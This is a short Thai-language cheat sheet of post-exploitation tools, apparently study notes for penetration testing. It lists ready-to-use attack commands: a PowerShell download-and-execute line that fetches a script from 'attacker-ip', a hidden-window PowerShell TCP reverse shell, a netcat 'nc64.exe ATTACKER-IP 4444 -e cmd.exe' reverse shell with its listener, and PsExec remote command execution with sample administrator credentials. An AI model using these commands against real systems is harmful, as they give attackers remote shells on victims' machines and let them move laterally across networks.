Post-Exploitation Tools



Post-Exploitation ควบคุมระบบ, ค้นหาข้อมูล

1.Invoke-PowerShellTcp.ps1

คืออะไร: PowerShell reverse shell script ที่ใช้เชื่อมกลับมาหา attacker

คำสั่งตั้ง listener (ฝั่ง attacker):

nc -lvnp 4444

ฝั่งเป้าหมาย (เมื่อรันใน PowerShell):

powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://attacker-ip/Invoke-PowerShellTcp.ps1')"

หรือฝังใน payload:

powershell -nop -w hidden -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER-IP',4444);$stream = $client.GetStream();..."



2. nc64.exe (Netcat)

คืออะไร: เครื่องมือ netcat สำหรับ Windows 64-bit ใช้สำหรับส่งข้อมูล TCP/UDP ระหว่างเครื่อง

การสร้าง reverse shell จาก Windows (ฝั่งเหยื่อ):

nc64.exe ATTACKER-IP 4444 -e cmd.exe

คำสั่งตั้ง listener (ฝั่ง attacker):

nc -lvnp 4444



3.PsExec64.exe

คืออะไร: เป็นของ Microsoft Sysinternals ใช้รันคำสั่งบนเครื่องเป้าหมาย Windows แบบ remote

เหมาะกับ: ใช้หลังจากได้สิทธิ์ Domain Admin เพื่อรันคำสั่งบนเครื่องอื่น

คำสั่งพื้นฐาน:

PsExec64.exe \\192.168.1.10 -u Administrator -p Pass123 cmd.exe

อธิบาย:

\\ = ระบุเครื่องเป้าหมาย

-u = ชื่อผู้ใช้

-p = รหัสผ่าน

cmd.exe = เปิด shell บนเครื่องเป้าหมาย